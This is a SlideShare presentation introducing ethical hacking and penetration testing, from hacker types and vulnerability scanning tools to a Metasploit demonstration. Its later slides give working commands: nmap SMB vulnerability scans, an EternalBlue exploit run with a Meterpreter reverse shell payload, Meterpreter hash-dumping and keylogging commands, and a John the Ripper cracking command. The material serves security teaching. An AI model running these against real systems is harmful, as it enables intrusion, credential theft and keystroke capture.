SlideShare a Scribd company logo

Introduction To Ethical Hacking

Download as PPTX, PDF
Raghav Bisht
Raghav Bisht

Hacking involves exploiting vulnerabilities in computer systems or networks to gain unauthorized access. There are different types of hackers, including white hat hackers who perform ethical hacking to test security, black hat hackers who perform hacking with malicious intent, and grey hat hackers who may sometimes hack ethically and sometimes not. Ethical hacking involves testing one's own systems for vulnerabilities without causing harm. Vulnerability assessments and penetration tests are common ethical hacking techniques that involve scanning for vulnerabilities and attempting to exploit them in a controlled way. Popular tools used for ethical hacking include Kali Linux, Nmap, Metasploit, and John the Ripper.

Related slideshows

Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
CSE-Ethical-Hacking-ppt.pptx
CSE-Ethical-Hacking-ppt.pptxCSE-Ethical-Hacking-ppt.pptx
CSE-Ethical-Hacking-ppt.pptx
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
1 of 42
Introduction To Ethical Hacking
What is Hacking ?  Process to bypass the security mechanisms.  Unauthorized use of computer and network.  Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose.  Hacking is the process of exploiting vulnerabilities to gain unauthorized access to systems or resources.
Who are hackers ?  Hacker is a term used by some to mean "a clever programmer" and by others, especially those in popular media, to mean "someone who tries to break into computer systems."
Types of Hackers  White Hat  IT professional  Administrators  Black Hat  Crackers  Grey Hat
Understanding the need to hack your own system  Basis for Ethical Hacking.  To catch a thief, think like a thief
Overall goals of an ethical hacker  Hack your systems in a nondestructive fashion.  Enumerate vulnerabilities and , if necessary, prove to management that vulnerabilities exit and can be exploited.  Apply result to remove the vulnerabilities and better secure your systems.
Vulnerability Assessment  A vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.
Vulnerability Assessment Tools  Nexpose Community  QualysGuard  OpenVAS  Nikto  Nmap  Nessus Professional  Acunetix  Netsparker  IBM AppScan  Burp Suite
What is Penetration Testing  A penetration test, also known as a pen test, is a simulated cyber attack against your network, infrastructure, devices, computer system or any other environment to check for exploitable vulnerabilities.
Types of Penetration Tests  Black Box Penetration Testing  White Box Penetration Testing  Grey Box Penetration Testing
Black Box Penetration Testing  In black box penetration testing, tester has no idea about the systems that he is going to test. He is interested to gather information about the target network or system. For example, in this testing, a tester only knows what should be the expected outcome and he does not know how the outcomes arrives. He does not examine any programming codes.
White Box Penetration Testing  This is a comprehensive testing, as tester has been provided with whole range of information about the systems and/or network such as Schema, Source code, OS details, IP address, etc. It is normally considered as a simulation of an attack by an internal source. It is also known as structural, glass box, clear box, and open box testing.  White box penetration testing examines the code coverage and does data flow testing, path testing, loop testing, etc.
Grey Box Penetration Testing  In this type of testing, a tester usually provides partial or limited information about the internal details of the program of a system. It can be considered as an attack by an external hacker who had gained illegitimate access to an organization's network infrastructure documents.
Penetration Testing Stages
Top 10 Common Vulnerabilities  SQL Injection  Cross Site Scripting  Broken Authentication and Session Management  Insecure Direct Object References  Cross Site Request Forgery  Security Misconfiguration  Insecure Cryptographic Storage  Failure to restrict URL Access  Insufficient Transport Layer Protection  Un-validated Redirects and Forwards
Demo Website and VMs  https://demo.testfire.net  http://testphp.vulnweb.com  OWASP Mutillidae II  Attack-defense online lab
Introduction To Ethical Hacking
Building Hacking Environment  Kali Linux - http://www.kali.org/downloads/
Kali Linux
Ports Scanning With NMAP  nmap –sS -T4 –v <target>
Foot-printing Services With NMAP  nmap –sS –sV -T4 –v <target>
Vulnerability Scanning With NMAP  nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06- 025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln- ms17-010 192.168.10.135
Web Vulnerability Scanning  OWASP ZAP – zaproxy
Starting with Metasploit !!!  The Metasploit project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.  Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc.
What is metasploit ?  Metasploit contain various exploits, payloads, modules etc.  Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems.  As Metasploit is an open source where any one can use it. This framework supports different operating systems like windows, linux ,mac os x etc.
Metasploit terms  Exploit  used to take advantage of a security flaw within a system, network, or application.  Payload  is code that our victim computer to execute by the Metasploit framework.  Module  a small piece of code that can be added to the Metasploit framework to execute an attack.  Shell-code  a small piece of code used as a payload.
What is a vulnerability?  A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system.  A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
What is an exploit?  To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.  Exploits often deliver a payload to the target system to grant the attacker access to the system.
What is a payload?  A payload is the piece of software that lets you control a computer system after it’s been exploited.  The payload is typically attached to and delivered by the exploit.  Metasploit most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes etc.
What is msfconsole ?  MSFconsole is an all-in-one interface to most of the features in Metasploit.  MSFconsole can be used to launch attacks, creating listeners, and much, much more.  Commands :  Show exploits  Show payloads  Show options  Use exploit
Commands  set payload  Set LHOST  Set RHOST  Back  Info  Session  Session –l  Session –i 1
Meterpreter commands  Getuid -> show uid  Ps -> show active process  Migrate -> command used when hacker want to migrate his process to any administrative privileges process.  Hashdump -> to dump password hash.  Screenshot -> to take screenshot of victim.  Shell -> to enter into the victim shell.  download C:<file name>  upload C:<file name>
More Meterpreter commands  keyscan_start -> start sniffing key strokes.  keyscan_dump  keyscan_stop  uictl disable keyboard  uictl enable keyboard
Demonstration - Service Exploitation
Reconnaissance  Ports and service scan of target system >> nmap -sS -p445 -sV -v <victim_IP>
Exploitation – ms17_010_eternalblue >> msfconsole msf5 > use exploit/windows/smb/ms17_010_eternalblue msf > set payload windows/x64/meterpreter/reverse_tcp
msf5 > show options msf5 > set RHOST <victim_IP> Exploitation – ms17_010_eternalblue
Exploitation – ms17_010_eternalblue
Introduction To Ethical Hacking
Windows Password Cracking  John the ripper  Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt
Introduction To Ethical Hacking
Introduction To Ethical Hacking

More Related Content

Introduction To Ethical Hacking

  • 2. What is Hacking ?  Process to bypass the security mechanisms.  Unauthorized use of computer and network.  Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose.  Hacking is the process of exploiting vulnerabilities to gain unauthorized access to systems or resources.
  • 3. Who are hackers ?  Hacker is a term used by some to mean "a clever programmer" and by others, especially those in popular media, to mean "someone who tries to break into computer systems."
  • 4. Types of Hackers  White Hat  IT professional  Administrators  Black Hat  Crackers  Grey Hat
  • 5. Understanding the need to hack your own system  Basis for Ethical Hacking.  To catch a thief, think like a thief
  • 6. Overall goals of an ethical hacker  Hack your systems in a nondestructive fashion.  Enumerate vulnerabilities and , if necessary, prove to management that vulnerabilities exit and can be exploited.  Apply result to remove the vulnerabilities and better secure your systems.
  • 7. Vulnerability Assessment  A vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.
  • 8. Vulnerability Assessment Tools  Nexpose Community  QualysGuard  OpenVAS  Nikto  Nmap  Nessus Professional  Acunetix  Netsparker  IBM AppScan  Burp Suite
  • 9. What is Penetration Testing  A penetration test, also known as a pen test, is a simulated cyber attack against your network, infrastructure, devices, computer system or any other environment to check for exploitable vulnerabilities.
  • 10. Types of Penetration Tests  Black Box Penetration Testing  White Box Penetration Testing  Grey Box Penetration Testing
  • 11. Black Box Penetration Testing  In black box penetration testing, tester has no idea about the systems that he is going to test. He is interested to gather information about the target network or system. For example, in this testing, a tester only knows what should be the expected outcome and he does not know how the outcomes arrives. He does not examine any programming codes.
  • 12. White Box Penetration Testing  This is a comprehensive testing, as tester has been provided with whole range of information about the systems and/or network such as Schema, Source code, OS details, IP address, etc. It is normally considered as a simulation of an attack by an internal source. It is also known as structural, glass box, clear box, and open box testing.  White box penetration testing examines the code coverage and does data flow testing, path testing, loop testing, etc.
  • 13. Grey Box Penetration Testing  In this type of testing, a tester usually provides partial or limited information about the internal details of the program of a system. It can be considered as an attack by an external hacker who had gained illegitimate access to an organization's network infrastructure documents.
  • 15. Top 10 Common Vulnerabilities  SQL Injection  Cross Site Scripting  Broken Authentication and Session Management  Insecure Direct Object References  Cross Site Request Forgery  Security Misconfiguration  Insecure Cryptographic Storage  Failure to restrict URL Access  Insufficient Transport Layer Protection  Un-validated Redirects and Forwards
  • 16. Demo Website and VMs  https://demo.testfire.net  http://testphp.vulnweb.com  OWASP Mutillidae II  Attack-defense online lab
  • 18. Building Hacking Environment  Kali Linux - http://www.kali.org/downloads/
  • 20. Ports Scanning With NMAP  nmap –sS -T4 –v <target>
  • 21. Foot-printing Services With NMAP  nmap –sS –sV -T4 –v <target>
  • 22. Vulnerability Scanning With NMAP  nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06- 025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln- ms17-010 192.168.10.135
  • 23. Web Vulnerability Scanning  OWASP ZAP – zaproxy
  • 24. Starting with Metasploit !!!  The Metasploit project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.  Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc.
  • 25. What is metasploit ?  Metasploit contain various exploits, payloads, modules etc.  Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems.  As Metasploit is an open source where any one can use it. This framework supports different operating systems like windows, linux ,mac os x etc.
  • 26. Metasploit terms  Exploit  used to take advantage of a security flaw within a system, network, or application.  Payload  is code that our victim computer to execute by the Metasploit framework.  Module  a small piece of code that can be added to the Metasploit framework to execute an attack.  Shell-code  a small piece of code used as a payload.
  • 27. What is a vulnerability?  A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system.  A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
  • 28. What is an exploit?  To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.  Exploits often deliver a payload to the target system to grant the attacker access to the system.
  • 29. What is a payload?  A payload is the piece of software that lets you control a computer system after it’s been exploited.  The payload is typically attached to and delivered by the exploit.  Metasploit most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes etc.
  • 30. What is msfconsole ?  MSFconsole is an all-in-one interface to most of the features in Metasploit.  MSFconsole can be used to launch attacks, creating listeners, and much, much more.  Commands :  Show exploits  Show payloads  Show options  Use exploit
  • 31. Commands  set payload  Set LHOST  Set RHOST  Back  Info  Session  Session –l  Session –i 1
  • 32. Meterpreter commands  Getuid -> show uid  Ps -> show active process  Migrate -> command used when hacker want to migrate his process to any administrative privileges process.  Hashdump -> to dump password hash.  Screenshot -> to take screenshot of victim.  Shell -> to enter into the victim shell.  download C:<file name>  upload C:<file name>
  • 33. More Meterpreter commands  keyscan_start -> start sniffing key strokes.  keyscan_dump  keyscan_stop  uictl disable keyboard  uictl enable keyboard
  • 34. Demonstration - Service Exploitation
  • 35. Reconnaissance  Ports and service scan of target system >> nmap -sS -p445 -sV -v <victim_IP>
  • 36. Exploitation – ms17_010_eternalblue >> msfconsole msf5 > use exploit/windows/smb/ms17_010_eternalblue msf > set payload windows/x64/meterpreter/reverse_tcp
  • 37. msf5 > show options msf5 > set RHOST <victim_IP> Exploitation – ms17_010_eternalblue
  • 40. Windows Password Cracking  John the ripper  Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt